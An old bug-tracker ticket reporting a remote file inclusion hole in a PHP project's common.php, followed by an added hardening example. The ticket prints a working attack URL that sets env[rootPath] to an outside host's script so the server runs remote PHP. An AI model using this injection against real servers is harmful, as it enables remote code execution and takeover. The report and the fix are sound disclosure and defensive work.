#30 Security problem with include $env['rootPath']...

v2.0
open
nobody
5
2007-07-16
2007-07-16
Anonymous
No

Spammers and crackers seem to really like this line in common.php:
include_once( $env['rootPath'].'/include/adodb/adodb.inc.php' );

When they call the script like e.g.:
......./include/common.php?env[rootPath]=http://server.net/script.txt?

They can execute all sorts of PHP code inside your server installation!

- This assumes, of course, that register_globals and allow_url_fopen are both on...
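One way to close this hole at the top of common.php, shown as an added example that is not part of the original report or the project's own code. It assumes common.php lives in `<root>/include/`, as the reported URL suggests; the 403 responses and error messages are illustrative.

```php
<?php
// Added example: hardened head of include/common.php (layout is an assumption).
// Server-side precondition named in the report: set register_globals = Off
// and allow_url_fopen = Off in php.ini so request data cannot become $env
// and include() cannot fetch http:// URLs.

// 1. Refuse direct HTTP requests to this file; it is meant to be included.
if (isset($_SERVER['SCRIPT_FILENAME'])
    && realpath($_SERVER['SCRIPT_FILENAME']) === realpath(__FILE__)) {
    header('HTTP/1.1 403 Forbidden');
    exit('Direct access not permitted.');
}

// 2. Reject requests that try to supply "env" themselves
//    (e.g. ?env[rootPath]=...), whatever register_globals is set to.
foreach (array($_GET, $_POST, $_COOKIE) as $input) {
    if (isset($input['env'])) {
        header('HTTP/1.1 403 Forbidden');
        exit('Invalid request.');
    }
}

// 3. Derive the root path from this file's own location instead of
//    trusting a variable that register_globals could have populated.
if (!isset($env) || !is_array($env)) {
    $env = array();
}
$env['rootPath'] = dirname(dirname(__FILE__)); // <root>/include/common.php -> <root>

// 4. Resolve the target and confirm it is a local file under the root
//    before including it. realpath() returns false for URLs and missing files.
$adodb = realpath($env['rootPath'] . '/include/adodb/adodb.inc.php');
if ($adodb === false
    || strpos($adodb, $env['rootPath'] . DIRECTORY_SEPARATOR) !== 0) {
    exit('Configuration error: ADOdb library not found.');
}
require_once $adodb;
```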

Discussion